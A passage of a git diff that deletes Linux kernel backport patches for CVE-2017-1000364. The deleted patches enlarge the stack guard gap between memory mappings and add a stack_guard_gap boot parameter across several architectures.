-+	unsigned long gap_addr;
- 	int error;
- 
--	/*
--	 * We must make sure the anon_vma is allocated
--	 * so that the anon_vma locking is not a noop.
--	 */
--	if (unlikely(anon_vma_prepare(vma)))
--		return -ENOMEM;
--
- 	address &= PAGE_MASK;
- 	error = security_file_mmap(NULL, 0, 0, 0, address, 1);
- 	if (error)
- 		return error;
- 
--	vma_lock_anon_vma(vma);
-+	/* Enforce stack_guard_gap */
-+	gap_addr = address - stack_guard_gap;
-+	if (gap_addr > address)
-+		return -ENOMEM;
-+	prev = vma->vm_prev;
-+	if (prev && prev->vm_end > gap_addr) {
-+		if (!(prev->vm_flags & VM_GROWSDOWN))
-+			return -ENOMEM;
-+		/* Check that both stack segments have the same anon_vma? */
-+	}
-+
-+	/* We must make sure the anon_vma is allocated. */
-+	if (unlikely(anon_vma_prepare(vma)))
-+		return -ENOMEM;
- 
- 	/*
- 	 * vma->vm_start/vm_end cannot change under us because the caller
- 	 * is required to hold the mmap_sem in read mode.  We need the
- 	 * anon_vma lock to serialize against concurrent expand_stacks.
- 	 */
-+	vma_lock_anon_vma(vma);
- 
- 	/* Somebody else might have raced and expanded it already */
- 	if (address < vma->vm_start) {
-@@ -1802,28 +1836,25 @@ int expand_downwards(struct vm_area_struct *vma,
- 	return error;
- }
- 
--/*
-- * Note how expand_stack() refuses to expand the stack all the way to
-- * abut the next virtual mapping, *unless* that mapping itself is also
-- * a stack mapping. We want to leave room for a guard page, after all
-- * (the guard page itself is not added here, that is done by the
-- * actual page faulting logic)
-- *
-- * This matches the behavior of the guard page logic (see mm/memory.c:
-- * check_stack_guard_page()), which only allows the guard page to be
-- * removed under these circumstances.
-- */
-+/* enforced gap between the expanding stack and other mappings. */
-+unsigned long stack_guard_gap = 256UL<<PAGE_SHIFT;
-+
-+static int __init cmdline_parse_stack_guard_gap(char *p)
-+{
-+	unsigned long val;
-+	char *endptr;
-+
-+	val = simple_strtoul(p, &endptr, 10);
-+	if (!*endptr)
-+		stack_guard_gap = val << PAGE_SHIFT;
-+
-+	return 0;
-+}
-+__setup("stack_guard_gap=", cmdline_parse_stack_guard_gap);
-+
- #ifdef CONFIG_STACK_GROWSUP
- int expand_stack(struct vm_area_struct *vma, unsigned long address)
- {
--	struct vm_area_struct *next;
--
--	address &= PAGE_MASK;
--	next = vma->vm_next;
--	if (next && next->vm_start == address + PAGE_SIZE) {
--		if (!(next->vm_flags & VM_GROWSUP))
--			return -ENOMEM;
--	}
- 	return expand_upwards(vma, address);
- }
- 
-@@ -1846,14 +1877,6 @@ find_extend_vma(struct mm_struct *mm, unsigned long addr)
- #else
- int expand_stack(struct vm_area_struct *vma, unsigned long address)
- {
--	struct vm_area_struct *prev;
--
--	address &= PAGE_MASK;
--	prev = vma->vm_prev;
--	if (prev && prev->vm_end == address) {
--		if (!(prev->vm_flags & VM_GROWSDOWN))
--			return -ENOMEM;
--	}
- 	return expand_downwards(vma, address);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0002.patch
deleted file mode 100644
index a013d3fb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From a7d519473a32267e52f1f92141240451e5403dd3 Mon Sep 17 00:00:00 2001
-From: Helge Deller <deller@gmx.de>
-Date: Mon, 19 Jun 2017 17:34:05 +0200
-Subject: Allow stack to grow up to address space limit
-
-commit bd726c90b6b8ce87602208701b208a208e6d5600 upstream.
-
-Fix expand_upwards() on architectures with an upward-growing stack (parisc,
-metag and partly IA-64) to allow the stack to reliably grow exactly up to
-the address space limit given by TASK_SIZE.
-
-Signed-off-by: Helge Deller <deller@gmx.de>
-Acked-by: Hugh Dickins <hughd@google.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- mm/mmap.c | 13 ++++++++-----
- 1 file changed, 8 insertions(+), 5 deletions(-)
-
-diff --git a/mm/mmap.c b/mm/mmap.c
-index cbcf486..168742e 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -1727,16 +1727,19 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- 	if (!(vma->vm_flags & VM_GROWSUP))
- 		return -EFAULT;
- 
--	/* Guard against wrapping around to address 0. */
-+	/* Guard against exceeding limits of the address space. */
- 	address &= PAGE_MASK;
--	address += PAGE_SIZE;
--	if (!address)
-+	if (address >= TASK_SIZE)
- 		return -ENOMEM;
-+	address += PAGE_SIZE;
- 
- 	/* Enforce stack_guard_gap */
- 	gap_addr = address + stack_guard_gap;
--	if (gap_addr < address)
--		return -ENOMEM;
-+
-+	/* Guard against overflow */
-+	if (gap_addr < address || gap_addr > TASK_SIZE)
-+		gap_addr = TASK_SIZE;
-+
- 	next = vma->vm_next;
- 	if (next && next->vm_start < gap_addr) {
- 		if (!(next->vm_flags & VM_GROWSUP))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0003.patch
deleted file mode 100644
index a73c3166..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0003.patch
+++ /dev/null
@@ -1,700 +0,0 @@
-From 45c60e595758ce93431e72051c52552ee57af3a1 Mon Sep 17 00:00:00 2001
-From: Hugh Dickins <hughd@google.com>
-Date: Mon, 19 Jun 2017 04:03:24 -0700
-Subject: [PATCH] mm: larger stack guard gap, between vmas
-
-commit 1be7107fbe18eed3e319a6c3e83c78254b693acb upstream.
-
-Stack guard page is a useful feature to reduce a risk of stack smashing
-into a different mapping. We have been using a single page gap which
-is sufficient to prevent having stack adjacent to a different mapping.
-But this seems to be insufficient in the light of the stack usage in
-userspace. E.g. glibc uses as large as 64kB alloca() in many commonly
-used functions. Others use constructs liks gid_t buffer[NGROUPS_MAX]
-which is 256kB or stack strings with MAX_ARG_STRLEN.
-
-This will become especially dangerous for suid binaries and the default
-no limit for the stack size limit because those applications can be
-tricked to consume a large portion of the stack and a single glibc call
-could jump over the guard page. These attacks are not theoretical,
-unfortunatelly.
-
-Make those attacks less probable by increasing the stack guard gap
-to 1MB (on systems with 4k pages; but make it depend on the page size
-because systems with larger base pages might cap stack allocations in
-the PAGE_SIZE units) which should cover larger alloca() and VLA stack
-allocations. It is obviously not a full fix because the problem is
-somehow inherent, but it should reduce attack space a lot.
-
-One could argue that the gap size should be configurable from userspace,
-but that can be done later when somebody finds that the new 1MB is wrong
-for some special case applications.  For now, add a kernel command line
-option (stack_guard_gap) to specify the stack gap size (in page units).
-
-Implementation wise, first delete all the old code for stack guard page:
-because although we could get away with accounting one extra page in a
-stack vma, accounting a larger gap can break userspace - case in point,
-a program run with "ulimit -S -v 20000" failed when the 1MB gap was
-counted for RLIMIT_AS; similar problems could come with RLIMIT_MLOCK
-and strict non-overcommit mode.
-
-Instead of keeping gap inside the stack vma, maintain the stack guard
-gap as a gap between vmas: using vm_start_gap() in place of vm_start
-(or vm_end_gap() in place of vm_end if VM_GROWSUP) in just those few
-places which need to respect the gap - mainly arch_get_unmapped_area(),
-and and the vma tree's subtree_gap support for that.
-
-Change-Id: I611023b0bfe1cab7b3e5da13e331a7baaaaf6eb0
-Original-patch-by: Oleg Nesterov <oleg@redhat.com>
-Original-patch-by: Michal Hocko <mhocko@suse.com>
-Signed-off-by: Hugh Dickins <hughd@google.com>
-[wt: backport to 4.11: adjust context]
-[wt: backport to 4.9: adjust context ; kernel doc was not in admin-guide]
-[wt: backport to 4.4: adjust context ; drop ppc hugetlb_radix changes]
-[wt: backport to 3.18: adjust context ; no FOLL_POPULATE ;
-     s390 uses generic arch_get_unmapped_area()]
-[wt: backport to 3.16: adjust context]
-[wt: backport to 3.10: adjust context ; code logic in PARISC's
-     arch_get_unmapped_area() wasn't found ; code inserted into
-     expand_upwards() and expand_downwards() runs under anon_vma lock;
-     changes for gup.c:faultin_page go to memory.c:__get_user_pages();
-     included Hugh Dickins' fixes]
-Signed-off-by: Willy Tarreau <w@1wt.eu>
-Signed-off-by: Flex1911 <dedsa2002@gmail.com>
----
-
-diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt
-index 9a1c759..53be2c9 100644
---- a/Documentation/kernel-parameters.txt
-+++ b/Documentation/kernel-parameters.txt
-@@ -2550,6 +2550,13 @@
- 	spia_pedr=
- 	spia_peddr=
- 
-+	stack_guard_gap=	[MM]
-+			override the default stack gap protection. The value
-+			is in page units and it defines how many pages prior
-+			to (for stacks growing down) resp. after (for stacks
-+			growing up) the main stack are reserved for no other
-+			mapping. Default value is 256 pages.
-+
- 	stacktrace	[FTRACE]
- 			Enabled the stack tracer on boot up.
- 
-diff --git a/arch/arm/mm/mmap.c b/arch/arm/mm/mmap.c
-index a26960a..f058ca2 100644
---- a/arch/arm/mm/mmap.c
-+++ b/arch/arm/mm/mmap.c
-@@ -101,7 +101,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (len > mm->cached_hole_size) {
-@@ -183,7 +183,7 @@
- 			addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/frv/mm/elf-fdpic.c b/arch/frv/mm/elf-fdpic.c
-index 385fd30..cd76056 100644
---- a/arch/frv/mm/elf-fdpic.c
-+++ b/arch/frv/mm/elf-fdpic.c
-@@ -74,7 +74,7 @@
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(current->mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			goto success;
- 	}
- 
-diff --git a/arch/mips/mm/mmap.c b/arch/mips/mm/mmap.c
-index 302d779..63c07bd 100644
---- a/arch/mips/mm/mmap.c
-+++ b/arch/mips/mm/mmap.c
-@@ -103,7 +103,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/powerpc/mm/slice.c b/arch/powerpc/mm/slice.c
-index 73709f7..9cf001f 100644
---- a/arch/powerpc/mm/slice.c
-+++ b/arch/powerpc/mm/slice.c
-@@ -98,7 +98,7 @@
- 	if ((mm->task_size - len) < addr)
- 		return 0;
- 	vma = find_vma(mm, addr);
--	return (!vma || (addr + len) <= vma->vm_start);
-+	return (!vma || (addr + len) <= vm_start_gap(vma));
- }
- 
- static int slice_low_has_vma(struct mm_struct *mm, unsigned long slice)
-diff --git a/arch/sh/mm/mmap.c b/arch/sh/mm/mmap.c
-index afeb710..d027416 100644
---- a/arch/sh/mm/mmap.c
-+++ b/arch/sh/mm/mmap.c
-@@ -75,7 +75,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -158,7 +158,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/sparc/kernel/sys_sparc_64.c b/arch/sparc/kernel/sys_sparc_64.c
-index 3ee51f1..10a83ac 100644
---- a/arch/sparc/kernel/sys_sparc_64.c
-+++ b/arch/sparc/kernel/sys_sparc_64.c
-@@ -147,7 +147,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -237,7 +237,7 @@
- 
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/sparc/mm/hugetlbpage.c b/arch/sparc/mm/hugetlbpage.c
-index 07e1453..9f07641 100644
---- a/arch/sparc/mm/hugetlbpage.c
-+++ b/arch/sparc/mm/hugetlbpage.c
-@@ -182,7 +182,7 @@
- 		addr = ALIGN(addr, HPAGE_SIZE);
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/tile/mm/hugetlbpage.c b/arch/tile/mm/hugetlbpage.c
-index 42cfcba..d659736 100644
---- a/arch/tile/mm/hugetlbpage.c
-+++ b/arch/tile/mm/hugetlbpage.c
-@@ -312,7 +312,7 @@
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (current->mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/arch/x86/kernel/sys_x86_64.c b/arch/x86/kernel/sys_x86_64.c
-index b4d3c39..996378b 100644
---- a/arch/x86/kernel/sys_x86_64.c
-+++ b/arch/x86/kernel/sys_x86_64.c
-@@ -141,7 +141,7 @@
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (end - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (((flags & MAP_32BIT) || test_thread_flag(TIF_ADDR32))
-@@ -213,7 +213,7 @@
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/arch/x86/mm/hugetlbpage.c b/arch/x86/mm/hugetlbpage.c
-index f6679a7..dbc90e6 100644
---- a/arch/x86/mm/hugetlbpage.c
-+++ b/arch/x86/mm/hugetlbpage.c
-@@ -411,7 +411,7 @@
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (mm->get_unmapped_area == arch_get_unmapped_area)
-diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
-index 001ef01..628b324 100644
---- a/fs/hugetlbfs/inode.c
-+++ b/fs/hugetlbfs/inode.c
-@@ -169,7 +169,7 @@
- 		addr = ALIGN(addr, huge_page_size(h));
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
-index ef5c7e2..6234004 100644
---- a/fs/proc/task_mmu.c
-+++ b/fs/proc/task_mmu.c
-@@ -283,11 +283,7 @@
- 
- 	/* We don't show the stack guard page in /proc/maps */
- 	start = vma->vm_start;
--	if (stack_guard_page_start(vma, start))
--		start += PAGE_SIZE;
- 	end = vma->vm_end;
--	if (stack_guard_page_end(vma, end))
--		end -= PAGE_SIZE;
- 
- 	seq_printf(m, "%08lx-%08lx %c%c%c%c %08llx %02x:%02x %lu %n",
- 			start,
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index ce57fd0..e597775 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -1030,34 +1030,6 @@
- int set_page_dirty_lock(struct page *page);
- int clear_page_dirty_for_io(struct page *page);
- 
--/* Is the vma a continuation of the stack vma above it? */
--static inline int vma_growsdown(struct vm_area_struct *vma, unsigned long addr)
--{
--	return vma && (vma->vm_end == addr) && (vma->vm_flags & VM_GROWSDOWN);
--}
--
--static inline int stack_guard_page_start(struct vm_area_struct *vma,
--					     unsigned long addr)
--{
--	return (vma->vm_flags & VM_GROWSDOWN) &&
--		(vma->vm_start == addr) &&
--		!vma_growsdown(vma->vm_prev, addr);
--}
--
--/* Is the vma a continuation of the stack vma below it? */
--static inline int vma_growsup(struct vm_area_struct *vma, unsigned long addr)
--{
--	return vma && (vma->vm_start == addr) && (vma->vm_flags & VM_GROWSUP);
--}
--
--static inline int stack_guard_page_end(struct vm_area_struct *vma,
--					   unsigned long addr)
--{
--	return (vma->vm_flags & VM_GROWSUP) &&
--		(vma->vm_end == addr) &&
--		!vma_growsup(vma->vm_next, addr);
--}
--
- extern pid_t
- vm_is_stack(struct task_struct *task, struct vm_area_struct *vma, int in_group);
- 
-@@ -1467,6 +1439,7 @@
- 			struct address_space *mapping,
- 			struct file *filp);
- 
-+extern unsigned long stack_guard_gap;
- /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */
- extern int expand_stack(struct vm_area_struct *vma, unsigned long address);
- 
-@@ -1495,6 +1468,30 @@
- 	return vma;
- }
- 
-+static inline unsigned long vm_start_gap(struct vm_area_struct *vma)
-+{
-+	unsigned long vm_start = vma->vm_start;
-+
-+	if (vma->vm_flags & VM_GROWSDOWN) {
-+		vm_start -= stack_guard_gap;
-+		if (vm_start > vma->vm_start)
-+			vm_start = 0;
-+	}
-+	return vm_start;
-+}
-+
-+static inline unsigned long vm_end_gap(struct vm_area_struct *vma)
-+{
-+	unsigned long vm_end = vma->vm_end;
-+
-+	if (vma->vm_flags & VM_GROWSUP) {
-+		vm_end += stack_guard_gap;
-+		if (vm_end < vma->vm_end)
-+			vm_end = -PAGE_SIZE;
-+	}
-+	return vm_end;
-+}
-+
- static inline unsigned long vma_pages(struct vm_area_struct *vma)
- {
- 	return (vma->vm_end - vma->vm_start) >> PAGE_SHIFT;
-diff --git a/mm/memory.c b/mm/memory.c
-index 60a7dfc..e722760 100644
---- a/mm/memory.c
-+++ b/mm/memory.c
-@@ -1619,12 +1619,6 @@
- 	return page;
- }
- 
--static inline int stack_guard_page(struct vm_area_struct *vma, unsigned long addr)
--{
--	return stack_guard_page_start(vma, addr) ||
--	       stack_guard_page_end(vma, addr+PAGE_SIZE);
--}
--
- /**
-  * __get_user_pages() - pin user pages in memory
-  * @tsk:	task_struct of target task
-@@ -1775,11 +1769,6 @@
- 				int ret;
- 				unsigned int fault_flags = 0;
- 
--				/* For mlock, just skip the stack guard page. */
--				if (foll_flags & FOLL_MLOCK) {
--					if (stack_guard_page(vma, start))
--						goto next_page;
--				}
- 				if (foll_flags & FOLL_WRITE)
- 					fault_flags |= FAULT_FLAG_WRITE;
- 				if (nonblocking)
-@@ -3087,40 +3076,6 @@
- }
- 
- /*
-- * This is like a special single-page "expand_{down|up}wards()",
-- * except we must first make sure that 'address{-|+}PAGE_SIZE'
-- * doesn't hit another vma.
-- */
--static inline int check_stack_guard_page(struct vm_area_struct *vma, unsigned long address)
--{
--	address &= PAGE_MASK;
--	if ((vma->vm_flags & VM_GROWSDOWN) && address == vma->vm_start) {
--		struct vm_area_struct *prev = vma->vm_prev;
--
--		/*
--		 * Is there a mapping abutting this one below?
--		 *
--		 * That's only ok if it's the same stack mapping
--		 * that has gotten split..
--		 */
--		if (prev && prev->vm_end == address)
--			return prev->vm_flags & VM_GROWSDOWN ? 0 : -ENOMEM;
--
--		expand_downwards(vma, address - PAGE_SIZE);
--	}
--	if ((vma->vm_flags & VM_GROWSUP) && address + PAGE_SIZE == vma->vm_end) {
--		struct vm_area_struct *next = vma->vm_next;
--
--		/* As VM_GROWSDOWN but s/below/above/ */
--		if (next && next->vm_start == address + PAGE_SIZE)
--			return next->vm_flags & VM_GROWSUP ? 0 : -ENOMEM;
--
--		expand_upwards(vma, address + PAGE_SIZE);
--	}
--	return 0;
--}
--
--/*
-  * We enter with non-exclusive mmap_sem (to exclude vma changes,
-  * but allow concurrent faults), and pte mapped but not yet locked.
-  * We return with mmap_sem still held, but pte unmapped and unlocked.
-@@ -3137,10 +3092,6 @@
- 
- 	/* File mapping without ->vm_ops ? */
- 	if (vma->vm_flags & VM_SHARED)
--		return VM_FAULT_SIGBUS;
--
--	/* Check if we need to add a guard page to the stack */
--	if (check_stack_guard_page(vma, address) < 0)
- 		return VM_FAULT_SIGBUS;
- 
- 	/* Use the zero-page for reads */
-diff --git a/mm/mmap.c b/mm/mmap.c
-index e495a84..b94a982 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -259,6 +259,7 @@
- 	unsigned long rlim, retval;
- 	unsigned long newbrk, oldbrk;
- 	struct mm_struct *mm = current->mm;
-+	struct vm_area_struct *next;
- 	unsigned long min_brk;
- 
- 	down_write(&mm->mmap_sem);
-@@ -303,7 +304,8 @@
- 	}
- 
- 	/* Check against existing mmap mappings. */
--	if (find_vma_intersection(mm, oldbrk, newbrk+PAGE_SIZE))
-+	next = find_vma(mm, oldbrk);
-+	if (next && newbrk + PAGE_SIZE > vm_start_gap(next))
- 		goto out;
- 
- 	/* Ok, looks good - let it rip. */
-@@ -1426,8 +1428,8 @@
- 		unsigned long len, unsigned long pgoff, unsigned long flags)
- {
- 	struct mm_struct *mm = current->mm;
--	struct vm_area_struct *vma;
--	unsigned long start_addr;
-+	struct vm_area_struct *vma, *prev;
-+	unsigned long start_addr, vm_start, prev_end;
- 
- 	if (len > TASK_SIZE)
- 		return -ENOMEM;
-@@ -1437,9 +1439,10 @@
- 
- 	if (addr) {
- 		addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)) &&
-+		    (!prev || addr >= vm_end_gap(prev)))
- 			return addr;
- 	}
- 	if (len > mm->cached_hole_size) {
-@@ -1450,7 +1453,17 @@
- 	}
- 
- full_search:
--	for (vma = find_vma(mm, addr); ; vma = vma->vm_next) {
-+	for (vma = find_vma_prev(mm, addr, &prev); ; prev = vma,
-+						vma = vma->vm_next) {
-+		if (prev) {
-+			prev_end = vm_end_gap(prev);
-+			if (addr < prev_end) {
-+				addr = prev_end;
-+				/* If vma already violates gap, forget it */
-+				if (vma && addr > vma->vm_start)
-+					addr = vma->vm_start;
-+			}
-+		}
- 		/* At this point:  (!vma || addr < vma->vm_end). */
- 		if (TASK_SIZE - len < addr) {
- 			/*
-@@ -1465,16 +1478,16 @@
- 			}
- 			return -ENOMEM;
- 		}
--		if (!vma || addr + len <= vma->vm_start) {
-+		vm_start = vma ? vm_start_gap(vma) : TASK_SIZE;
-+		if (addr + len <= vm_start) {
- 			/*
- 			 * Remember the place where we stopped the search:
- 			 */
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
--		addr = vma->vm_end;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 	}
- }
- #endif	
-@@ -1498,9 +1511,10 @@
- 			  const unsigned long len, const unsigned long pgoff,
- 			  const unsigned long flags)
- {
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long addr = addr0, start_addr;
-+	unsigned long vm_start, prev_end;
- 
- 	/* requested length too big for entire address space */
- 	if (len > TASK_SIZE)
-@@ -1512,9 +1526,10 @@
- 	/* requesting a specific address */
- 	if (addr) {
- 		addr = PAGE_ALIGN(addr);
--		vma = find_vma(mm, addr);
-+		vma = find_vma_prev(mm, addr, &prev);
- 		if (TASK_SIZE - len >= addr &&
--				(!vma || addr + len <= vma->vm_start))
-+				(!vma || addr + len <= vm_start_gap(vma)) &&
-+				(!prev || addr >= vm_end_gap(prev)))
- 			return addr;
- 	}
- 
-@@ -1538,18 +1553,21 @@
- 		 * else if new region fits below vma->vm_start,
- 		 * return with success:
- 		 */
--		vma = find_vma(mm, addr);
--		if (!vma || addr+len <= vma->vm_start)
-+		vma = find_vma_prev(mm, addr, &prev);
-+		vm_start = vma ? vm_start_gap(vma) : mm->mmap_base;
-+		prev_end = vm_end_gap(prev);
-+
-+		if (addr + len <= vm_start && addr >= prev_end)
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr);
- 
-  		/* remember the largest hole we saw so far */
-- 		if (addr + mm->cached_hole_size < vma->vm_start)
-- 		        mm->cached_hole_size = vma->vm_start - addr;
--
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
-+ 
- 		/* try just below the current vma->vm_start */
--		addr = vma->vm_start-len;
--	} while (len < vma->vm_start);
-+		addr = vm_start - len;
-+	} while (len < vm_start);
- 
- fail:
- 	/*
-@@ -1749,7 +1767,9 @@
-  */
- int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- {
--	int error;
-+	struct vm_area_struct *next;
-+	unsigned long gap_addr;
-+	int error = 0;
- 
- 	if (!(vma->vm_flags & VM_GROWSUP))
- 		return -EFAULT;
-@@ -1758,23 +1778,33 @@
- 	 * We must make sure the anon_vma is allocated
- 	 * so that the anon_vma locking is not a noop.
- 	 */
-+	/* Guard against wrapping around to address 0. */
-+	address &= PAGE_MASK;
-+	address += PAGE_SIZE;
-+	if (!address)
-+		return -ENOMEM;
-+
-+	/* Enforce stack_guard_gap */
-+	gap_addr = address + stack_guard_gap;
-+	if (gap_addr < address)
-+		return -ENOMEM;
-+	next = vma->vm_next;
-+	if (next && next->vm_start < gap_addr) {
-+		if (!(next->vm_flags & VM_GROWSUP))
-+			return -ENOMEM;
-+		/* Check that both stack segments have the same anon_vma? */
-+	}
-+
-+	/* We must make sure the anon_vma is allocated. */
- 	if (unlikely(anon_vma_prepare(vma)))
- 		return -ENOMEM;
--	vma_lock_anon_vma(vma);
- 
- 	/*
- 	 * vma->vm_start/vm_end cannot change under us because the caller
- 	 * is required to hold the mmap_sem in read mode.  We need the
- 	 * anon_vma lock to serialize against concurrent expand_stacks.
--	 * Also guard against wrapping around to address 0.
- 	 */
--	if (address < PAGE_ALIGN(address+4))
--		address = PAGE_ALIGN(address+4);
--	else {
--		vma_unlock_anon_vma(vma);
--		return -ENOMEM;
--	}
--	error = 0;
-+	vma_lock_anon_vma(vma);
- 
- 	/* Somebody else might have raced and expanded it already */
- 	if (address > vma->vm_end) {
-@@ -1804,27 +1834,36 @@
- int expand_downwards(struct vm_area_struct *vma,
- 				   unsigned long address)
- {
-+	struct vm_area_struct *prev;
-+	unsigned long gap_addr;
- 	int error;
--
--	/*
--	 * We must make sure the anon_vma is allocated
--	 * so that the anon_vma locking is not a noop.
--	 */
--	if (unlikely(anon_vma_prepare(vma)))
--		return -ENOMEM;
- 
- 	address &= PAGE_MASK;
- 	error = security_file_mmap(NULL, 0, 0, 0, address, 1);
- 	if (error)
- 		return error;
- 
--	vma_lock_anon_vma(vma);
-+	/* Enforce stack_guard_gap */
-+	gap_addr = address - stack_guard_gap;
-+	if (gap_addr > address)
-+		return -ENOMEM;
-+	prev = vma->vm_prev;
-+	if (prev && prev->vm_end > gap_addr) {
-+		if (!(prev->vm_flags & VM_GROWSDOWN))
-+			return -ENOMEM;
-+		/* Check that both stack segments have the same anon_vma? */
-+	}
-+
-+	/* We must make sure the anon_vma is allocated. */
-+	if (unlikely(anon_vma_prepare(vma)))
-+		return -ENOMEM;
- 
- 	/*
- 	 * vma->vm_start/vm_end cannot change under us because the caller
- 	 * is required to hold the mmap_sem in read mode.  We need the
- 	 * anon_vma lock to serialize against concurrent expand_stacks.
- 	 */
-+	vma_lock_anon_vma(vma);
- 
- 	/* Somebody else might have raced and expanded it already */
- 	if (address < vma->vm_start) {
-@@ -1848,6 +1887,23 @@
- 	return error;
- }
- 
-+/* enforced gap between the expanding stack and other mappings. */
-+unsigned long stack_guard_gap = 256UL<<PAGE_SHIFT;
-+
-+static int __init cmdline_parse_stack_guard_gap(char *p)
-+{
-+	unsigned long val;
-+	char *endptr;
-+
-+	val = simple_strtoul(p, &endptr, 10);
-+	if (!*endptr)
-+		stack_guard_gap = val << PAGE_SHIFT;
-+
-+	return 0;
-+}
-+__setup("stack_guard_gap=", cmdline_parse_stack_guard_gap);
-+
-+
- #ifdef CONFIG_STACK_GROWSUP
- int expand_stack(struct vm_area_struct *vma, unsigned long address)
- {
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0003.patch.base64
deleted file mode 100644
index a5ee3b10..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.4/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
